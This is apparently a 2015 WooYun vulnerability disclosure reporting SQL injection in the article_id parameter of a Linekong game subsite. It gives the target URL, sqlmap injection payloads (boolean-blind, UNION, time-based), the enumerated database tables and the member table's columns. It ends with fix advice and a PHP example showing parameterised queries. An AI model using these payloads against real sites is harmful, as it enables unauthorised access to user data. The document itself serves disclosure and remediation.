Vulnerability summary

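Bug ID: wooyun-2015-0119298

Vulnerability title: SQL injection in a Linekong (蓝港) subsite

Vendor: linekong.com

Author: 路人甲

Submitted: 2015-06-10 10:16

Fixed: 2015-07-25 18:30

Disclosed: 2015-07-25 18:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]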


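Vulnerability details

Disclosure status:

2015-06-10: Details sent to the vendor; awaiting vendor handling
2015-06-10: Vendor confirmed; details disclosed to the vendor only
2015-06-20: Details disclosed to core white hats and experts in related fields
2015-06-30: Details disclosed to regular white hats
2015-07-10: Details disclosed to trainee white hats
2015-07-25: Details disclosed to the public

Brief description:

As the title says. It isn't going to be taken offline again, is it? ^_^

Detailed description:

SQL injection point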

http://yt.linekong.com/special/festival/2009/51/news.php?article_id=10869


The article_id parameter is vulnerable to SQL injection.

sqlmap identified the following injection points with a total of 94 HTTP(s) requests:
---
Parameter: article_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: article_id=10869' AND 2185=2185 AND 'PiSw'='PiSw
Vector: AND [INFERENCE]
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: article_id=-1690' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b6b71,0x63514d516c655063644d,0x716a787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: article_id=10869' AND SLEEP(5) AND 'EBvI'='EBvI
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] yt_web
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
[85 tables]
+----------------------------------+
| jd_activity_0527_info |
| jd_activity_0527_log |
| jd_activity_certified_phone |
| jd_activity_fanpai_card |
| jd_activity_fanpai_log |
| jd_activity_lover_binding_log |
| jd_activity_lover_getkey_log |
| jd_activity_newserver_log |
| jd_activity_renzheng_log |
| jd_activity_spread_log |
| jd_activity_spread_playLog |
| jd_activity_spread_receive |
| jd_activity_spread_register |
| jd_activity_spread_relationship |
| jd_activity_spread_spreader |
| jd_activity_tanabata_binding_log |
| jd_activity_tanabata_getkey_log |
| jd_activity_tuiguang_child |
| jd_activity_tuiguang_log |
| jd_activity_tuiguang_parent |
| jd_activity_whcltuiguang_child |
| jd_activity_whcltuiguang_log |
| jd_activity_whcltuiguang_parent |
| jd_address |
| jd_article |
| jd_article_inserl |
| jd_build |
| jd_cdkey_zzdjk |
| jd_cdkey_zzdjk_count |
| jd_channel |
| jd_columns |
| jd_comment |
| jd_dcj_temp |
| jd_demo |
| jd_download |
| jd_editors_inserl |
| jd_flash |
| jd_grading |
| jd_group |
| jd_image |
| jd_image_inserl |
| jd_lottery_20091201_cdkey |
| jd_lottery_20091201_log |
| jd_lottery_codekey |
| jd_lottery_codekey_click_log |
| jd_lottery_codekey_log |
| jd_lottery_getItem |
| jd_lottery_paytop |
| jd_lottery_paytop_cdkey |
| jd_member |
| jd_passportstat |
| jd_ploy_vote |
| jd_ploy_vote_cdkey |
| jd_sort |
| jd_temp_belle_friend |
| jd_temp_belle_user |
| jd_temp_huapi |
| jd_temp_quiz |
| jd_temp_tong |
| jd_temp_torch_base |
| jd_temp_torch_id |
| jd_temp_torch_rank |
| jd_temp_torch_user |
| jd_temp_torch_user_bak |
| jd_temp_user815 |
| jd_temp_wjdcwj |
| jd_tempprops |
| jd_tempprops_15 |
| jd_tempprops_20091115 |
| jd_tempprops_20091216 |
| jd_tempprops_20100108 |
| jd_tempprops_2_res |
| jd_tempprops_3 |
| jd_tempprops_5 |
| jd_tempprops_res |
| jd_types |
| jd_url |
| jd_url_inserl |
| jd_vote |
| jd_vote_inserl |
| jd_vote_option |
| jd_wj_article |
| jd_wj_article_inserl |
| jd_wj_image |
| jd_wj_image_inserl |
+----------------------------------+
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
back-end DBMS: MySQL >= 5.0.0
Database: yt_web
Table: jd_member
[13 entries]

Proof of vulnerability:


Fix:

Filter the parameter

Copyright notice: when reposting, credit the source 路人甲@乌云
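
Filtering article_id holds up best when the value is validated as an integer and then bound as a query parameter. The following added example (not code from the report or from the vendor) contrasts that with the quoted-string concatenation that the sqlmap payloads imply. The jd_article columns, the function names and the in-memory SQLite database are assumptions made so that it runs offline.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the site's database: in-memory SQLite with a
// hypothetical two-column jd_article table (the real schema is not on the page).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jd_article (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO jd_article VALUES (10869, 'Festival news')");

// Pattern the sqlmap payloads imply: the value is pasted between single quotes.
function findArticleVulnerable(PDO $db, string $raw): ?array
{
    $row = $db->query("SELECT id, title FROM jd_article WHERE id = '$raw'")
              ->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened: strict integer validation, then a bound parameter.
function findArticleSafe(PDO $db, string $raw): ?array
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject anything that is not a positive integer
    }
    $stmt = $db->prepare('SELECT id, title FROM jd_article WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Inputs: a normal id, the boolean-based probe from the report, and its
// always-false counterpart (constructed for comparison).
$inputs = [
    '10869',
    "10869' AND 2185=2185 AND 'PiSw'='PiSw",
    "10869' AND 2185=2186 AND 'PiSw'='PiSw",
];
foreach ($inputs as $raw) {
    printf("%-42s vulnerable=%-5s safe=%s\n", $raw,
        findArticleVulnerable($db, $raw) ? 'row' : 'none',
        findArticleSafe($db, $raw) ? 'row' : 'none');
}
```

Against MySQL through pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false so that the value is bound by the server rather than interpolated on the client.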


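Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-06-10 18:28

Vendor reply:

This 倚天 (Yitian) site has not been taken offline. The issue has been passed to the developers; thank you for pointing it out.

Latest status:

None yet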